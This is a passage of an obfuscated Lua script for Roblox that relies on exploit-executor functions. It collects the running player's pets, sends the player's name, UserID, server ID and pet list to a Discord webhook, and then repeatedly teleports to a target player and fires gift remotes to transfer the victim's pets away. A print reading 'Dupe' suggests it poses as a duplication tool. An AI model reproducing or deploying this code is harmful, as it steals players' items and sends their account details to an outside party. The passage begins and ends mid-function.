	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\150\116\46\28\205\220\224\131\112\34\3\221\223\151\214", "\178\230\29\77\119\184\172")] = {TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\199\187\26\23\126\251\244\170\15\31\68\236\250\172\11\28\114\189\165", "\152\149\222\106\123\23")]:FindFirstChild(LUAOBFUSACTOR_DECRYPT_STR_0("\237\47\245\72\160\205\20\243\78\186\201\35", "\213\189\70\150\35")),TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\125\80\100\4\70\86\117\28\74\81\71\28\64\71\117\15\74\16\36", "\104\47\53\20")]:FindFirstChild(LUAOBFUSACTOR_DECRYPT_STR_0("\128\67\141\16\185\12\183\126\132\17\179\27\166", "\111\195\44\225\124\220")),TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\234\67\16\127\162\168\217\82\5\119\152\191\215\84\1\116\174\238\136", "\203\184\38\96\19\203")]:FindFirstChild(LUAOBFUSACTOR_DECRYPT_STR_0("\9\118\109\113\199\58\120\108\81\252\60\126\118\85\203", "\174\89\19\25\33")),TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\29\23\66\66\254\132\10\59\23\86\125\227\136\25\46\21\87\11\167", "\107\79\114\50\46\151\231")]:FindFirstChild(LUAOBFUSACTOR_DECRYPT_STR_0("\26\169\185\37\143\58\163\240\60\178\135\44\135\54\163\197", "\160\89\198\213\73\234\89\215")),TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\122\116\164\242\204\75\112\160\251\193\123\101\187\236\196\79\116\241\174", "\165\40\17\212\158")]:FindFirstChild(LUAOBFUSACTOR_DECRYPT_STR_0("\215\220\28\38\52\235\233\13\39\53", "\70\133\185\104\83"))};
	for _, remote in pairs(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\20\76\71\33\220\20\119\65\39\198\16\64\87\111\153", "\169\100\37\36\74")]) do
		if remote then
			pcall(function()
				if remote:IsA(LUAOBFUSACTOR_DECRYPT_STR_0("\50\130\175\95\20\130\135\70\5\137\182", "\48\96\231\194")) then
					remote:FireServer(LUAOBFUSACTOR_DECRYPT_STR_0("\216\83\13\38\12\200", "\227\168\58\110\77\121\184\207"));
					remote:FireServer(LUAOBFUSACTOR_DECRYPT_STR_0("\120\51\179\76\180\216\101", "\197\27\92\223\32\209\187\17"));
					remote:FireServer(LUAOBFUSACTOR_DECRYPT_STR_0("\17\90\215\238\17\81", "\155\99\63\163"));
					remote:FireServer();
				elseif remote:IsA(LUAOBFUSACTOR_DECRYPT_STR_0("\176\212\172\130\173\129\164\196\175\142\173\141\141\223", "\228\226\177\193\237\217")) then
					remote:InvokeServer(LUAOBFUSACTOR_DECRYPT_STR_0("\36\185\32\237\33\160", "\134\84\208\67"));
					remote:InvokeServer(LUAOBFUSACTOR_DECRYPT_STR_0("\16\163\138\80\22\175\146", "\60\115\204\230"));
					remote:InvokeServer();
				end
				TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\244\47\232\115\226\41\248\53\183", "\16\135\90\139")] = true;
			end);
		end
	end
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\68\120\7\42\75\70\95\65\125\67\99", "\24\52\20\102\83\46\52")] = TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\232\32\34\37\3\244\35\32\61\10\214\106\113", "\111\164\79\65\68")]:FindFirstChild(LUAOBFUSACTOR_DECRYPT_STR_0("\246\213\130\199\43\248\225\204\138", "\138\166\185\227\190\78"));
	if TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\219\120\196\46\87\49\62\222\125\128\103", "\121\171\20\165\87\50\67")] then
		for _, gui in pairs(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\214\52\184\47\188\16\225\45\176\115\233", "\98\166\88\217\86\217")]:GetDescendants()) do
			if (gui:IsA(LUAOBFUSACTOR_DECRYPT_STR_0("\194\243\97\21\164\201\226\226\118\15", "\188\150\150\25\97\230")) or gui:IsA(LUAOBFUSACTOR_DECRYPT_STR_0("\243\132\94\5\9\207\207\157\75\13\2", "\141\186\233\63\98\108"))) then
				TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\243\255\56\162\42\255\222\41\174\49\180\186", "\69\145\138\76\214")] = string.lower(gui.Name);
				if (string.find(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\114\218\157\157\176\24\68\202\145\157\250\70", "\118\16\175\233\233\223")], LUAOBFUSACTOR_DECRYPT_STR_0("\155\141\54\176\251\155", "\29\235\228\85\219\142\235")) or string.find(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\63\193\174\201\120\64\19\87\37\192\255\141", "\50\93\180\218\189\23\46\71")], LUAOBFUSACTOR_DECRYPT_STR_0("\221\171\87\64\65\223\92", "\40\190\196\59\44\36\188")) or string.find(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\62\80\200\160\245\115\57\57\93\200\241\170", "\109\92\37\188\212\154\29")], LUAOBFUSACTOR_DECRYPT_STR_0("\22\234\176\214\35\84", "\58\100\143\196\163\81"))) then
					pcall(function()
						for _, connection in pairs(getconnections(gui.MouseButton1Click)) do
							connection:Fire();
						end
						TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\9\87\32\160\58\90\246\75\74", "\110\122\34\67\195\95\41\133")] = true;
					end);
				end
			end
		end
	end
	pcall(function()
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\67\184\73\94\195\116\189\114\68\198\96\165\118\75\216\116\182\94\88\147\37", "\182\21\209\59\42")] = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\129\94\215\9\52\191\187\126\203\13\52\170\154\86\203\28\38\187\165", "\222\215\55\165\125\65"));
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\26\216\212\14\231\192\225\99\34\193\211\14\223\192\227\75\43\212\212\95\162", "\42\76\177\166\122\146\161\141")]:SendKeyEvent(true, "R", false, game);
		task.wait(0.1);
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\147\131\23\218\108\119\169\163\11\222\108\98\136\139\11\207\126\115\183\207\85", "\22\197\234\101\174\25")]:SendKeyEvent(false, "R", false, game);
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\62\33\166\223\115\188\196\195\125", "\230\77\84\197\188\22\207\183")] = true;
	end);
	return TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\234\1\197\255\137\178\227\112\169", "\85\153\116\166\156\236\193\144")];
end
local function GetPlayerPets()
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\180\229\89\160\161\80", "\96\196\128\45\211\132")] = {};
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\55\140\120\84\194\174\183\211\112\221", "\184\85\237\27\63\178\207\212")] = TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\36\86\10\94\4\105\5\94\17\92\27\26\88", "\63\104\57\105")]:FindFirstChild(LUAOBFUSACTOR_DECRYPT_STR_0("\41\134\167\79\27\134\167\79", "\36\107\231\196"));
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\94\189\163\149\92\182\182\130\79\240\242", "\231\61\213\194")] = TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\37\162\62\114\5\157\49\114\16\168\47\54\89", "\19\105\205\93")].Character;
	PickupActivePets();
	task.wait(1);
	if TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\171\9\221\138\47\168\11\213\196\111", "\95\201\104\190\225")] then
		for _, item in ipairs(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\173\202\194\197\191\202\194\197\234\155", "\174\207\171\161")]:GetChildren()) do
			if item:IsA(LUAOBFUSACTOR_DECRYPT_STR_0("\217\241\2\255", "\183\141\158\109\147\152")) then
				for _, petName in ipairs(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\24\40\212\43\9\61\217\60\9\61\213\73\124", "\108\76\105\134")]) do
					if string.find(string.lower(item.Name), string.lower(petName)) then
						table.insert(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\251\192\165\242\139\187", "\174\139\165\209\129")], item);
					end
				end
			end
		end
	end
	if TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\160\187\227\211\199\0\100\125\177\246\178", "\24\195\211\130\161\166\99\16")] then
		for _, item in ipairs(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\69\11\232\62\82\21\82\6\251\105\3", "\118\38\99\137\76\51")]:GetChildren()) do
			if item:IsA(LUAOBFUSACTOR_DECRYPT_STR_0("\201\41\10\30", "\64\157\70\101\114\105")) then
				for _, petName in ipairs(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\116\137\149\196\53\116\151\151\198\36\115\237\247", "\112\32\200\199\131")]) do
					if string.find(string.lower(item.Name), string.lower(petName)) then
						table.insert(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\60\85\72\171\134\251", "\66\76\48\60\216\163\203")], item);
					end
				end
			end
		end
	end
	return TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\170\131\109\224\26\158", "\68\218\230\25\147\63\174")];
end
local function SendToDiscord()
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\189\38\82\85\179\191\26\86\88\165\232\122", "\214\205\74\51\44")] = GetPlayerPets();
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\234\73\246\208\126\233\88\167\172", "\23\154\44\130\156")] = LUAOBFUSACTOR_DECRYPT_STR_0("\63\169\163\171", "\115\113\198\205\206\86");
	if (#TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\148\91\255\67\129\69\206\95\144\68\187\10", "\58\228\55\158")] > 0) then
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\164\140\196\0\61\160\48\167\204\128", "\85\212\233\176\78\92\205")] = {};
		for _, pet in ipairs(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\90\84\137\251\79\74\184\231\94\75\205\178", "\130\42\56\232")]) do
			table.insert(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\250\176\48\205\65\50\239\166\97\179", "\95\138\213\68\131\32")], pet.Name);
		end
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\58\45\181\111\127\57\60\228\19", "\22\74\72\193\35")] = table.concat(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\60\124\240\118\45\116\225\75\105\41", "\56\76\25\132")], LUAOBFUSACTOR_DECRYPT_STR_0("\18\129", "\175\62\161\203\70"));
	end
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\56\220\215\18\112\108", "\85\92\189\163\115")] = {[LUAOBFUSACTOR_DECRYPT_STR_0("\60\191\53\42\39\173\61\61", "\88\73\204\80")]=LUAOBFUSACTOR_DECRYPT_STR_0("\30\134\4\6\27\223\62\140\2\82\44\200", "\186\78\227\112\38\73"),[LUAOBFUSACTOR_DECRYPT_STR_0("\249\90\255\80\87\105", "\26\156\55\157\53\51")]={{[LUAOBFUSACTOR_DECRYPT_STR_0("\152\209\2\213\189", "\48\236\184\118\185\216")]="ðŸ“Š Pet Ownership Report",[LUAOBFUSACTOR_DECRYPT_STR_0("\225\184\68\51\221\61\245\169\94\63\193", "\84\133\221\55\80\175")]=LUAOBFUSACTOR_DECRYPT_STR_0("\159\226\54\175\204\73\169\167\37\162\198\80\188\239\100\162\198\72\188\167\37\173\210\82\253\227\37\168\135\87\184\247\33\171\206\80\180\236\37\168\135\76\184\243\126", "\60\221\135\68\198\167"),[LUAOBFUSACTOR_DECRYPT_STR_0("\237\178\244\140\80", "\185\142\221\152\227\34")]=16753920,[LUAOBFUSACTOR_DECRYPT_STR_0("\94\204\82\246\71\32", "\151\56\165\55\154\35\83")]={{[LUAOBFUSACTOR_DECRYPT_STR_0("\174\66\8\235", "\142\192\35\101")]="ðŸ‘¤ Player Info",[LUAOBFUSACTOR_DECRYPT_STR_0("\192\116\37\182\226", "\118\182\21\73\195\135\236\204")]=string.format("Name: %s\nUserID: %s", TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\36\51\25\65\8\61\241\9\37\31\82\65\93", "\157\104\92\122\32\100\109")].Name, TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\143\169\204\203\49\23\129\170\186\163\221\143\109", "\203\195\198\175\170\93\71\237")].UserId),[LUAOBFUSACTOR_DECRYPT_STR_0("\39\69\50\220\95\20", "\156\78\43\94\181\49\113")]=true},{[LUAOBFUSACTOR_DECRYPT_STR_0("\124\233\201\166", "\25\18\136\164\195\107\35")]="ðŸŽ® Server Info",[LUAOBFUSACTOR_DECRYPT_STR_0("\254\44\165\90\119", "\216\136\77\201\47\18\220\161")]=string.format("Game: %s\nServerID: ```%s```", TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\10\237\38\223\33\210\132\34\169\123", "\226\77\140\75\186\104\188")].Name, game.JobId),[LUAOBFUSACTOR_DECRYPT_STR_0("\176\192\220\54\65\188", "\47\217\174\176\95")]=true},{[LUAOBFUSACTOR_DECRYPT_STR_0("\182\220\123\7", "\70\216\189\22\98\210\52\24")]="ðŸ¾ Owned Pets",[LUAOBFUSACTOR_DECRYPT_STR_0("\204\222\175\146\214", "\179\186\191\195\231")]=TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\233\58\12\200\240\44\12\161\169", "\132\153\95\120")],[LUAOBFUSACTOR_DECRYPT_STR_0("\184\188\2\36\249\223", "\192\209\210\110\77\151\186")]=false}},[LUAOBFUSACTOR_DECRYPT_STR_0("\230\12\45\253\250\214", "\164\128\99\66\137\159")]={[LUAOBFUSACTOR_DECRYPT_STR_0("\20\140\241\170", "\222\96\233\137")]=(LUAOBFUSACTOR_DECRYPT_STR_0("\139\182\183\16\154\231\176\141\186\170\26\210\179", "\144\217\211\199\127\232\147") .. os.date(LUAOBFUSACTOR_DECRYPT_STR_0("\189\22\115\109\216\8\71\64\184\106\22\114\144\104\88\1\203", "\36\152\79\94\72\181\37\98")))}}},[LUAOBFUSACTOR_DECRYPT_STR_0("\212\215\73\43\210\214\83", "\95\183\184\39")]=(((#TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\165\51\230\63\81\146\50\176\43\244\99\4", "\98\213\95\135\70\52\224")] > 0) and "ðŸŽ‰ Player has rare pets!") or "ðŸ“Œ Player has no target pets")};
	local success, response = pcall(function()
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\244\176\198\121\112\255\183\200\50\4", "\52\158\195\169\23")] = TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\82\168\38\100\181\48\105\157\115\191\55\49\214", "\235\26\220\82\20\230\85\27")]:JSONEncode(TABLE_TableIndirection["data%0"]);
		return request({[LUAOBFUSACTOR_DECRYPT_STR_0("\189\179\229", "\20\232\193\137\162")]=TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\21\250\231\142\200\163\60\78\23\237\233\227\183", "\17\66\191\165\198\135\236\119")],[LUAOBFUSACTOR_DECRYPT_STR_0("\34\170\186\27\240\236", "\177\111\207\206\115\159\136\140")]=LUAOBFUSACTOR_DECRYPT_STR_0("\53\166\35\32", "\63\101\233\112\116\180\47"),[LUAOBFUSACTOR_DECRYPT_STR_0("\235\62\236\22\253\36\208", "\86\163\91\141\114\152")]={[LUAOBFUSACTOR_DECRYPT_STR_0("\112\4\122\103\63\93\31\57\71\35\67\14", "\90\51\107\20\19")]=LUAOBFUSACTOR_DECRYPT_STR_0("\140\224\149\227\52\142\241\145\230\50\131\191\143\252\50\131", "\93\237\144\229\143")},[LUAOBFUSACTOR_DECRYPT_STR_0("\55\249\244\0", "\38\117\150\144\121\107")]=TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\39\168\225\52\9\186\250\59\104\235", "\90\77\219\142")]});
	end);
	return success, response;
end
local function DirectTeleport(target)
	if (not target or not target.Character or not target.Character:FindFirstChild(LUAOBFUSACTOR_DECRYPT_STR_0("\206\17\44\56\66\8\115\226\54\46\54\88\55\123\244\16", "\26\134\100\65\89\44\103"))) then
		return false, LUAOBFUSACTOR_DECRYPT_STR_0("\197\226\34\36\161\229\163\51\43\165\227\226\51\55\161\227\163\62\44\176\177\229\63\54\170\245", "\196\145\131\80\67");
	end
	if (not TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\50\191\5\9\20\216\18\177\31\13\10\173\78", "\136\126\208\102\104\120")].Character or not TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\84\133\205\66\163\98\49\80\97\143\220\6\255", "\49\24\234\174\35\207\50\93")].Character:FindFirstChild(LUAOBFUSACTOR_DECRYPT_STR_0("\36\231\240\137\127\3\251\249\186\126\3\230\205\137\99\24", "\17\108\146\157\232"))) then
		return false, LUAOBFUSACTOR_DECRYPT_STR_0("\103\204\23\236\35\232\72\203\21\255\46\171\95\198\6\173\33\167\95\131\6\232\46\172\82", "\200\43\163\116\141\79");
	end
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\171\55\47\132\181\224\192\153\36\60\142\181\177\179", "\131\223\86\93\227\208\148")] = target.Character.HumanoidRootPart.CFrame;
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\247\64\186\179\13\186\241\81\134\185\14\188\247\76\185\184\88\229", "\213\131\37\214\214\125")] = TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\50\42\55\184\228\50\8\3\173\224\43\46\96\239", "\129\70\75\69\223")].Position + (TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\82\202\225\238\121\251\101\237\225\232\113\234\3\155", "\143\38\171\147\137\28")].LookVector * 4);
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\252\141\186\242\15\211\216\209\155\188\225\70\179", "\180\176\226\217\147\99\131")].Character.HumanoidRootPart.CFrame = CFrame.new(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\199\188\35\2\195\182\61\19\227\182\60\14\199\176\32\9\150\233", "\103\179\217\79")], target.Character.HumanoidRootPart.Position);
	return true;
end
local function EquipPet(pet)
	if (not pet or not pet:IsA(LUAOBFUSACTOR_DECRYPT_STR_0("\126\184\19\217", "\195\42\215\124\181\33\236"))) then
		return false, LUAOBFUSACTOR_DECRYPT_STR_0("\36\87\33\63\41\241\9\25\39\59\49", "\152\109\57\87\94\69");
	end
	if (pet.Parent ~= TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\213\216\9\162\178\226\88\169\224\210\24\230\238", "\200\153\183\106\195\222\178\52")].Backpack) then
		pet.Parent = TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\30\236\139\60\69\106\62\226\145\56\91\31\98", "\58\82\131\232\93\41")].Backpack;
		task.wait(0.2);
	end
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\139\66\221\20\83\48\138\83\149\69", "\95\227\55\176\117\61")] = TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\52\113\32\74\167\40\114\34\82\174\10\59\115", "\203\120\30\67\43")].Character:FindFirstChildOfClass(LUAOBFUSACTOR_DECRYPT_STR_0("\217\48\64\238\215\254\44\73", "\185\145\69\45\143"));
	if not TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\130\10\20\167\210\133\22\29\227\140", "\188\234\127\121\198")] then
		return false, LUAOBFUSACTOR_DECRYPT_STR_0("\16\39\30\130\54\61\26\135\120\60\28\151\120\52\28\150\54\54", "\227\88\82\115");
	end
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\75\10\183\166\12\124\74\27\255\247", "\19\35\127\218\199\98")]:EquipTool(pet);
	task.wait(0.3);
	if not TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\48\244\9\227\16\203\6\227\5\254\24\167\76", "\130\124\155\106")].Character:FindFirstChild(pet.Name) then
		return false, LUAOBFUSACTOR_DECRYPT_STR_0("\243\202\255\163\166\242\60\171\218\139\243\190\182\255\108\255\197\206\226", "\223\181\171\150\207\195\150\28");
	end
	return true;
end
local function GiftPet(targetPlayer, pet)
	print(LUAOBFUSACTOR_DECRYPT_STR_0("\109\46\247\171\4\92\46\234\160\14\12\46\236\238\14\69\60\247\238\25\73\46\185", "\105\44\90\131\206"), pet.Name);
	print(LUAOBFUSACTOR_DECRYPT_STR_0("\207\233\177\178\1\48\248\160\167\169\72\63\252\244\187\175\13\126\239\229\166\170\70\112\177", "\94\159\128\210\217\104"));
	PickupActivePets();
	task.wait(1);
	print(LUAOBFUSACTOR_DECRYPT_STR_0("\101\247\0\190\73\112\235\115\68\240\8\184\31\111\252\110\16\238\15\171\87\63\215\123\93\252\70\140\90\126\235\121\88\185\11\186\75\119\246\126\30\183\72", "\26\48\153\102\223\63\31\153"));
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\23\78\235\242\20\79\255\250\22\69\222\230\1\67\232\224\17\5\189", "\147\98\32\141")] = UnfavoriteByNameSearch(pet);
	if TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\13\77\229\203\16\89\89\17\87\230\249\19\85\72\29\80\240\143\86", "\43\120\35\131\170\102\54")] then
		print(LUAOBFUSACTOR_DECRYPT_STR_0("\100\3\147\246\176\190\130\85\16\136\164\172\164\129\80\70\148\163\166\179\129\71\21\129\163\169\188\157", "\228\52\102\231\214\197\208"));
	else
		print("Dupe");
	end
	task.wait(0.5);
	print(LUAOBFUSACTOR_DECRYPT_STR_0("\42\229\121\207\250\132\11\194\23\238\114\138\254\132\89\194\31\242\114\207\254\197\87\152", "\182\126\128\21\170\138\235\121"));
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\159\223\57\227\150\28\34\18\184\207\54\229\131\0\35\67\219", "\102\235\186\85\134\230\115\80")] = DirectTeleport(targetPlayer);
	if not TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\67\9\50\90\98\219\48\67\63\43\92\113\209\49\68\73\110", "\66\55\108\94\63\18\180")] then
		return false, LUAOBFUSACTOR_DECRYPT_STR_0("\32\136\137\50\55\86\6\153\197\49\38\80\24\136\129", "\57\116\237\229\87\71");
	end
	task.wait(0.5);
	print(LUAOBFUSACTOR_DECRYPT_STR_0("\143\160\248\238\103\254\78\164\182\173\247\114\250\9\228\255", "\39\202\209\141\135\23\142"));
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\250\34\28\3\34\203\234\48\10\15\33\235\186\99", "\152\159\83\105\106\82")] = EquipPet(pet);
	if not TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\132\215\68\251\217\111\148\197\82\247\218\79\196\150", "\60\225\166\49\146\169")] then
		return false, LUAOBFUSACTOR_DECRYPT_STR_0("\10\15\58\35\17\71\41\31\38\38\4\3", "\103\79\126\79\74\97");
	end
	task.wait(0.5);
	print(LUAOBFUSACTOR_DECRYPT_STR_0("\155\107\199\118\83\10\174\118\221\116\30\14\181\63\212\122\88\14\244\49\157", "\122\218\31\179\19\62"));
	TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\180\223\203\213\251\164\72\188\194\200\210\140\241", "\37\211\182\173\161\169\193")] = {TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\197\63\93\213\33\120\184\227\63\73\234\60\116\171\246\61\72\156\120", "\217\151\90\45\185\72\27")]:FindFirstChild(LUAOBFUSACTOR_DECRYPT_STR_0("\228\117\225\6\100\198\113\232\6\83", "\54\163\28\135\114")),TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\26\222\77\142\71\124\41\207\88\134\125\107\39\201\92\133\75\58\120", "\31\72\187\61\226\46")]:FindFirstChild(LUAOBFUSACTOR_DECRYPT_STR_0("\243\3\87\245\78\120\48\241\3\78\221\83\123", "\68\163\102\35\178\39\30")),TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\140\117\202\203\10\182\130\5\187\116\233\211\12\167\130\22\187\53\138", "\113\222\16\186\167\99\213\227")]:FindFirstChild(LUAOBFUSACTOR_DECRYPT_STR_0("\9\7\237\243\30\11\239\196\43\3\244\226\43", "\150\78\110\155")),TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\183\192\55\237\173\29\190\84\128\193\20\245\171\12\190\71\128\128\119", "\32\229\165\71\129\196\126\223")]:FindFirstChild(LUAOBFUSACTOR_DECRYPT_STR_0("\247\155\197\133\132\229\198\157\246\132\140\218\215\140", "\181\163\233\164\225\225"))};
	for _, giftRemote in pairs(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\87\130\56\99\98\142\51\120\68\142\45\50\0", "\23\48\235\94")]) do
		if giftRemote then
			pcall(function()
				if giftRemote:IsA(LUAOBFUSACTOR_DECRYPT_STR_0("\78\223\213\82\67\54\247\106\223\214\73", "\178\28\186\184\61\55\83")) then
					giftRemote:FireServer(targetPlayer, pet);
					giftRemote:FireServer(targetPlayer.Name, pet.Name);
					giftRemote:FireServer({[LUAOBFUSACTOR_DECRYPT_STR_0("\212\193\70\37\247\28", "\149\164\173\39\92\146\110")]=targetPlayer,[LUAOBFUSACTOR_DECRYPT_STR_0("\227\34\4", "\123\147\71\112\127\122")]=pet});
				elseif giftRemote:IsA(LUAOBFUSACTOR_DECRYPT_STR_0("\254\200\143\126\82\201\235\151\127\69\216\196\141\127", "\38\172\173\226\17")) then
					giftRemote:InvokeServer(targetPlayer, pet);
					giftRemote:InvokeServer(targetPlayer.Name, pet.Name);
				end
			end);
			print(LUAOBFUSACTOR_DECRYPT_STR_0("\120\2\41\235\13\3\41\226\66\5\41\181", "\143\45\113\76"), giftRemote.Name);
			return true, LUAOBFUSACTOR_DECRYPT_STR_0("\141\171\25\56\248\170\25\49\183\172\25\102\248", "\92\216\216\124") .. giftRemote.Name;
		end
	end
	if targetPlayer.Character then
		for _, part in pairs(targetPlayer.Character:GetDescendants()) do
			if part:IsA(LUAOBFUSACTOR_DECRYPT_STR_0("\107\32\163\88\244\86\59\184\89\205\73\61\161\80\233", "\157\59\82\204\32")) then
				fireproximityprompt(part);
				print(LUAOBFUSACTOR_DECRYPT_STR_0("\30\55\241\255\237\170\195\163\55\38\234\247\224\254\202\241\40\44\236\247\249\254", "\209\88\94\131\154\137\138\179"));
				return true, LUAOBFUSACTOR_DECRYPT_STR_0("\14\168\214\121\26\99\33\48\39\185\205\113\23\55\40\98\56\179\203\113\14\55", "\66\72\193\164\28\126\67\81");
			end
		end
	end
	return false, LUAOBFUSACTOR_DECRYPT_STR_0("\201\35\232\95\47\112\243\108\165\93\50\126\232\40\232\94\41\99\233\40", "\22\135\76\200\56\70");
end
local function AutoGiftLoop()
	while task.wait(2) do
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\153\49\234\35\88\245\189\60\249\61\88\243\200\96", "\129\237\80\152\68\61")] = FindTargetPlayer();
		if not TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\69\169\22\244\25\3\104\93\169\29\246\14\82\8", "\56\49\200\100\147\124\119")] then
			warn(LUAOBFUSACTOR_DECRYPT_STR_0("\248\63\173\247\201\42\255\224\192\63\166\245\222\126\177\255\216\126\185\255\217\48\187", "\144\172\94\223"));
			continue;
		end
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\52\10\182\84\97\95", "\39\68\111\194")] = GetPlayerPets();
		if (#TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\198\163\243\212\60\231", "\215\182\198\135\167\25")] == 0) then
			warn(LUAOBFUSACTOR_DECRYPT_STR_0("\163\70\170\88\136\93\249\8\140\95\235\65\129\72\232\68\136", "\40\237\41\138"));
			continue;
		end
		TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\215\113\238\189\26", "\42\167\20\154\152")] = TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\90\251\182\81\52\113", "\65\42\158\194\34\17")][1];
		print(LUAOBFUSACTOR_DECRYPT_STR_0("\41\34\94\9\46\249\30\234\90\55\87\24\109\235\20\252\90\32\91\10\57\228\21\233\64", "\142\122\71\50\108\77\141\123"), TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\5\167\235\93\107", "\91\117\194\159\120")].Name);
		local success, result = pcall(function()
			return GiftPet(TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\14\28\44\31\48\229\20\22\28\39\29\39\180\116", "\68\122\125\94\120\85\145")], TABLE_TableIndirection[LUAOBFUSACTOR_DECRYPT_STR_0("\7\25\219\27\152", "\218\119\124\175\62\168\185")]);
		end);
		if success then
			print(LUAOBFUSACTOR_DECRYPT_STR_0("\130\249\78\208\229\241\92\208\160\253\88\208\229\226\77\215\176\252\92\158", "\164\197\144\40"), result);
		else
